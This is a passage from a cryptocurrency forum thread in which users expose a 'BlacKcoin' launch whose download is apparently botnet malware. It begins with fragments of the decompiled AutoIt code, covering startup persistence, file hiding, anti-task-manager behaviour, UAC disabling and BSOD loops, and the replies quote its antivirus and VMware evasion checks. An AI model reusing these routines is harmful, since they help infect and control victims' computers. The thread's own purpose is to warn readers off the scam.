off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & '"' & @ScriptName & '"') FileClose($bat) EndIf If NOT FileExists($unicode_startup & "\start.lnk") Then FileCreateShortcut($unicode_userprofile & "\" & $path & "\84922.vbs", $unicode_startup & "\start.lnk") FileSetAttrib($unicode_startup & "\start.lnk", "+SH") EndIf EndFunc Local $persistence = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "9634675", "4800937", "NotFound") If $persistence = "8598688" Then checkvbs() AdlibRegister("persistence", 500) Else EndIf Func checkvbs() If NOT FileExists($uniscriptdir & "\run.vbs") Then FileWrite($uniscriptdir & "\run.vbs", "Set WshShell = WScript.CreateObject(" & '"' & "WScript.Shell" & 
'")' & @CRLF & "WshShell.Run" & '"' & "displaydrivers.exe " & @ScriptName & '"') EndIf EndFunc Local $systemhide = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "1166881", "3190765", "NotFound") If $systemhide = "2661758" Then AdlibRegister("systemhide", 500) Else EndIf Local $antitask = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "antitask1", "antitask2", "NotFound") If $antitask = "antitask3" Then AdlibRegister("antitask", 500) Else EndIf Local $uac = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "uac1", "uac2", "NotFound") If $uac = "uac3" Then AdlibRegister("disable_uac", 500) Else EndIf If $uac = "uac3" Then loop() EndIf If $systemhide = "2661758" Then loop() EndIf If $antitask = "antitask" Then loop() EndIf If $antibotkill = "antibotkill-3" Then loop() EndIf If $mutex = "mutex3" Then loop() EndIf If $protectprocess = "3450378" Then loop() EndIf If $persistence = "8598688" Then loop() EndIf Func loop() While 1 If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then __bsod($scriptname, False) EndIf If WinExists($path) Then bsod() Else EndIf Sleep(100) WEnd EndFunc
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sesko on January 22, 2014, 11:02:44 PM
If you have Avast, you'll probably be toasted: If ProcessExists("avastui.exe") Then Sleep(20000)
and hiding from: If ProcessExists("VMwaretray.exe") Then Exit
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 11:05:44 PM
Adds you to a botnet:
http://www.exposedbotnets.com/2013/12/bootsx-betabot-http-botnet-hosted-by.html
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 11:06:35 PM
If you have Avast, you'll probably be toasted: If ProcessExists("avastui.exe") Then Sleep(20000)
No more than any other AV. All it does is pause for 20 seconds if avast is found.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: SlidingHorn on January 22, 2014, 11:12:26 PM
How can you call it launched if you haven't even fully developed/compiled wallets?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: SlidingHorn on January 22, 2014, 11:14:11 PM
Adds you to a botnet:
http://www.exposedbotnets.com/2013/12/bootsx-betabot-http-botnet-hosted-by.html
Oh... that's how, lmao. I also love how the OP's entire posting history is begging for other alts... FAIL
Title: Re: [ANN][BlacK] My account was hacked. I did not crea | no premine ✓ | launched NOW
Post by: AMAZONBTC on January 23, 2014, 03:37:31 AM
My account was hacked. I did not create this topic.
BlacKcoin is SCAM
LMFAO! gtfo of this forum